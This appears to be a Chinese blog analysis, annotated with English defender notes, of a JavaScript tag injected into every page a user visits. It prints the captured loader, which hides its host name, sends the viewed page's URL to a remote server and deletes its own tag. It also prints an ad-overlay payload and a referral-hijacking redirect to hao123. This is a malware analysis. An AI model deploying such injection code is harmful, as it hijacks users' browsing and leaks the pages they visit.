打开任何网站,查看源代码,会发现html网页文件底部被插入了一行JS代码:
<!-- Injected tag as observed: an external script fetched over plain HTTP (no TLS) from n.cosbot.cn. -->
<script type="text/javascript" src="http://n.cosbot.cn/rb/i7.js"></script>
解析后得到源代码片段
// Stage-1 loader (captured sample, reformatted for reading; tokens unchanged).
// It waits 500 ms, measures the page, builds a request URL and pulls a second
// script from a host whose name is assembled from string fragments.
// Review notes for defenders:
//  - The host never appears as one contiguous string in this file, so a plain
//    string match on the domain will miss it; match on the fragments or on the
//    resulting request path (/fmt7p/) instead.
//  - The full address of the page being viewed (window.location.href) is sent
//    to the remote host in the `u` parameter, together with a random value and
//    the body width/height.
//  - The injected <script> element is removed 2 s after insertion, so a later
//    DOM inspection will not show it.
(function(d) {
  // Append a <script> for URL p to the first <head>, then remove the element
  // again after 2000 ms. Any error is swallowed silently by the empty catch.
  function $a(p) {
    try {
      var x = d.getElementsByTagName("head")[0];
      var y = x.appendChild($s(p));
      setTimeout(function() {
        x.removeChild(y)
      }, 2000)
    } catch (e) {}
  }
  // Shorthand for document.createElement.
  function $c(n) { return d.createElement(n) }
  // Build an async <script> element whose src is p.
  function $s(p) {
    var j = $c("script");
    j.src = p;
    j.async = true;
    j.type = "text/javascript";
    return j
  }
  // Counts how many times the page was measured as "too small".
  var amt = 0;
  function $rn() {
    var ww = d.body.clientWidth;
    var hh = d.body.clientHeight;
    // Fragments that concatenate (below) to "http://a.wdzsb.com.cn".
    var u = { j: "ht", c: "com.cn", q: "tp:", m: "b.", n: "wdzs", d: "a." };
    var be = u.j + u.q + "//" + u.d + u.n + u.m + u.c;
    // Query string: escaped page URL, a random number, body width and height.
    var en = escape(window.location.href) + "&a=" + Math.random() + "&w=" + ww + "&h=" + hh;
    // Proceeds only when `top == this`; presumably a top-level-window check so
    // the loader stays idle inside frames (depends on how $rn is invoked).
    if (top == this) {
      if (ww < 300 || hh < 40) {
        // Body smaller than 300x40: re-measure after 1 s; on the third small
        // measurement request the m.php variant instead.
        amt += 1;
        if (amt < 3) {
          setTimeout($rn, 1000)
        } else {
          $a(be + "/fmt7p/m.php?u=" + en)
        }
      } else {
        $a(be + "/fmt7p/?u=" + en)
      }
    }
  }
  setTimeout($rn, 500)
})(document);
这段JS的作用是动态加载并执行另一个远程js,其地址拼接后如下
http://a.wdzsb.com.cn/fmt7p/?u=http://www.wmdfw.com/baidu.php&a=0.3494681795691035&w=1349&h=3174
作用是将u(当前页面地址)、a(随机数)、w、h(页面宽高)几个参数传递给该地址返回的JS。直接访问后可以得到源代码片段
// Stage-2 payload (captured sample, reformatted for reading; tokens unchanged).
// It builds a 300x250 overlay pinned to the bottom-right corner of the host
// page and loads a third-party page into an iframe inside it.
// NOTE(review): the listing as published looks damaged by the blog's HTML
// filter: the inner double quotes of the innerHTML string are not escaped, and
// a property name appears to be missing before "300px" and "42px". Treat this
// as a transcript of the sample, not as runnable code.
// Review notes for defenders:
//  - Stable page-side indicators in this sample: the element id
//    "bd_uuid_rb_111268" and the global flag window._fmt_done_pg.
//  - The overlay uses z-index 2147483647, so it sits above the site's content.
(function(w, d) {
  var gid = "bd_uuid_rb_111268";
  // Shorthand for document.createElement.
  function $c(n) { return d.createElement(n) }
  // Make the overlay container visible, if it exists.
  function $show() {
    var e = d.getElementById(gid);
    if (e) { e.style.display = "block" }
  }
  // True when the overlay container is already in the document.
  function $isdone() {
    var e = d.getElementById(gid);
    if (e) { return true }
    return false
  }
  // Hide the overlay, then delete it from the DOM 10 s later.
  function $rm() {
    var e = d.getElementById(gid);
    if (e) { e.style.display = "none" }
    setTimeout($del, 10000)
  }
  // Remove the overlay container from the DOM.
  function $del() {
    var e = d.getElementById(gid);
    if (e) { e.parentNode.removeChild(e) }
  }
  // Build the overlay: hidden container -> styled box -> close button + iframe.
  function $drn() {
    if ($isdone()) { return }
    var l = $c("div");
    l.id = gid;
    l.style.display = "none";
    // Suppresses the context menu on the overlay container.
    l.oncontextmenu = function() { return false };
    l = d.body.appendChild(l);
    // NOTE(review): /MSIE 7|8/ matches "MSIE 7" or a bare "8" anywhere in the
    // user agent, not only "MSIE 8".
    var isIE6 = w.navigator.userAgent.match(/MSIE 6/ig) && !w.navigator.userAgent.match(/MSIE 7|8/ig);
    var sty = "";
    if (isIE6) {
      // IE6 branch: absolute positioning with a CSS expression() that
      // recomputes TOP from the scroll offset and viewport height.
      sty = "BORDER-RIGHT: 0px; BORDER-TOP: 0px; DISPLAY: block; Z-INDEX: 2147483647; RIGHT: 0px; padding:0;MARGIN: 0px; BORDER-LEFT: 0px; WIDTH: 300px; BOTTOM: auto; BORDER-BOTTOM: 0px; POSITION: absolute; TOP: expression(eval ((document.documentElement&&document.documentElement.scrollTop|| document.body.scrollTop)+(document.documentElement&&document.documentElement.clientHeight||document.body.clientHeight)-this.offsetHeight-0)); HEIGHT: 250px; BACKGROUND-COLOR: #ecf9fd; TEXT-ALIGN: left"
    } else {
      // Other browsers: position: fixed at right/bottom 0.
      sty = "display: block; position: fixed; padding: 0px; margin: 0px; border: 0px none;text-align: left; z-index: 2147483647; 300px; height: 250px; right: 0px; bottom: 0px; top: auto;"
    }
    var k = $c("div");
    k.style.cssText = sty;
    k = l.appendChild(k);
    // Close button: background image from dl.katman.cn; its onclick hides the
    // overlay and removes it 10 s later. The string is reproduced exactly as
    // published, including the line break inside it.
    k.innerHTML = "<span style="position:absolute;42px;height:14px;line-height:20px;right:0px;top:- 14px;cursor:pointer;text-align:right;display:block;background: url(http://dl.katman.cn/img/close.gif) 0px 0px no-repeat scroll;" onmouseover= "this.style.backgroundPosition='0 -20px';" onmouseout="this.style.backgroundPosition='0 0';" onclick="javascript:var e=document.getElementById('bd_uuid_rb_111268');if(!e)return;e.style.display='none';setTimeout(function(){var 
e=document.getElementById ('bd_uuid_rb_111268');if(e){e.parentNode.removeChild(e)}},10000);"></span>";
    var ifr = $c("iframe");
    ifr.scrolling = "no";
    ifr.marginWidth = "0";
    ifr.marginHeight = "0";
    ifr.frameBorder = "0";
    ifr.height = "250px";
    ifr.width = "300px";
    ifr = k.appendChild(ifr);
    var ul = "http://dl.katman.cn/cl/html/fmt7p.html";
    // The frame is first given a written document whose body onload navigates
    // to ul; only if that throws is ul assigned to ifr.src directly.
    // NOTE(review): presumably done so the iframe carries no src attribute in
    // the DOM; the listing itself does not state the reason.
    try {
      var doc = ifr.contentWindow.document;
      doc.open().write('<body onload="javascript:' + "window.location.href='" + ul + "';">");
      doc.close()
    } catch (e) { ifr.src = ul }
  }
  // Build the overlay, show it after 2 s, hide it after 1800 s (30 minutes).
  function $dly() {
    $drn();
    setTimeout($show, 2000);
    setTimeout($rm, 1000 * 1800)
  }
  // Run once per page: the global flag blocks a second execution.
  if (!window._fmt_done_pg) {
    window._fmt_done_pg = 1;
    setTimeout($dly, 50)
  }
})(window, document);
主要展示http://dl.katman.cn/cl/html/fmt7p.html地址的右下角窗口广告
因此不难看出域名
n.cosbot.cn a.wdzsb.com.cn dl.katman.cn
打开站长之家http://tool.chinaz.com/,查询到这三个域名均为成都西维数码科技有限公司 郑清华所有
与wayos每次偷偷更换的广告地址的所有者完全一致
http://n.cosbot.cn/cl/html/hao.html
<!--
  Redirect page (captured sample, reformatted for reading; tokens unchanged).
  It presents itself with a hao123 title, sets a one-hour marker cookie and
  forwards the browser to www.hao123.com.
  Review notes for defenders:
   - On the first visit within an hour the target carries ?tn=90826472_hao_pg
     (presumably a channel/referral identifier; the listing does not say).
   - On WebKit browsers the navigation goes through an <a rel="noreferrer">,
     which makes the browser omit the Referer header, so the destination does
     not see this intermediate page.
   - The cache-control meta tags ask the browser not to cache the page.
-->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="0">
<title>hao123_上网从这里开始</title>
</head>
<body>
<script>
(function(d){
  // Returns navigator.cookieEnabled when the property exists, else false.
  function isCkie(){
    var isSupport=false;
    if(typeof(navigator.cookieEnabled)!='undefined'){
      isSupport=navigator.cookieEnabled;
    }
    return isSupport;
  }
  // Cookie helper functions
  var sCkie=new function(){
    // Expiry time: now + millisecond, formatted with toGMTString()
    this.expTime=function(millisecond){if(millisecond.length==0){millisecond=0};var exp=new Date();exp.setTime(exp.getTime()+parseInt(millisecond));return exp.toGMTString();};
    // Create cookie; expires/path/domain/secure are appended only when truthy
    this.add=function(name,value,expires,path,domain,secure){d.cookie=name+"="+encodeURI(value)+(expires?(';expires='+expires):'')+(path?(';path='+path):'')+(domain?(';domain='+domain):'')+((secure)?';secure':'');};
    // Delete cookie (disabled in the sample)
    //this.del=function(name,path,domain){if(getCookie(name)){document.cookie=name+"="+((path)?(";path="+path):'')+((domain)?(";domain="+domain):'')+";expires=Mon,01-Jan-2006 00:00:01 GMT";}};
    // Read cookie: returns the decoded value, or '' when the name is not found
    this.get=function(name){var arg=name+"=";var alen=arg.length;var theCookie=''+d.cookie;var inCookieSite=theCookie.indexOf(arg);if(inCookieSite==-1||name==""){return '';}var begin=inCookieSite+alen;var end=theCookie.indexOf(';',begin);if(end==-1){end=theCookie.length;}return decodeURI(theCookie.substring(begin,end));};
  };
  var gUrl;
  if(isCkie()){
    var ckie=0;
    // Marker cookie name used to detect a visit within the last hour.
    var sid='lpvt_eef100d08ffffab743f371e2d5729249';
    var skie=sCkie.get(sid);
    if (skie!='') { ckie=parseInt(skie); }
    if(ckie<1){
      var rand=Math.random();
      // Math.random() is always below 1, so `rand<1.8` is always true and the
      // else branch below cannot run: every first visit gets the tn= URL.
      if(rand<1.8){
        gUrl="https://www.hao123.com/?tn=90826472_hao_pg";
      }else{
        gUrl="https://www.hao123.com/";
      }
      // Set the marker for one hour; path, domain and secure are passed as 0
      // and are therefore left out of the cookie string.
      sCkie.add(sid,'1',sCkie.expTime(1*60*60*1000),0,0,0);
    }else{
      gUrl="https://www.hao123.com/";
    }
  }else{
    gUrl="https://www.hao123.com/";
  }
  // Redirect to gUrl: window.navigate() where it exists, then either a
  // synthetic click on an <a rel="noreferrer"> (WebKit) or a meta refresh.
  (function(u){
    if(window.navigate&&typeof navigate=='function')navigate(u);
    var ua=navigator.userAgent;
    if(ua.match(/applewebkit/i)){
      var h = document.createElement('a');
      // rel=noreferrer: the browser sends no Referer header for this click.
      h.rel='noreferrer';
      h.href=u;
      document.body.appendChild(h);
      var evt=document.createEvent('MouseEvents');
      evt.initEvent('click', true,true);
      h.dispatchEvent(evt);
    }else{
      document.write('<meta http-equiv="Refresh" Content="0; Url='+u+'" >');
    }
  })(gUrl);
})(document);
</script>
</body>
</html>
51.la统计id:15820612
根据统计代码分析,广东地区为重灾区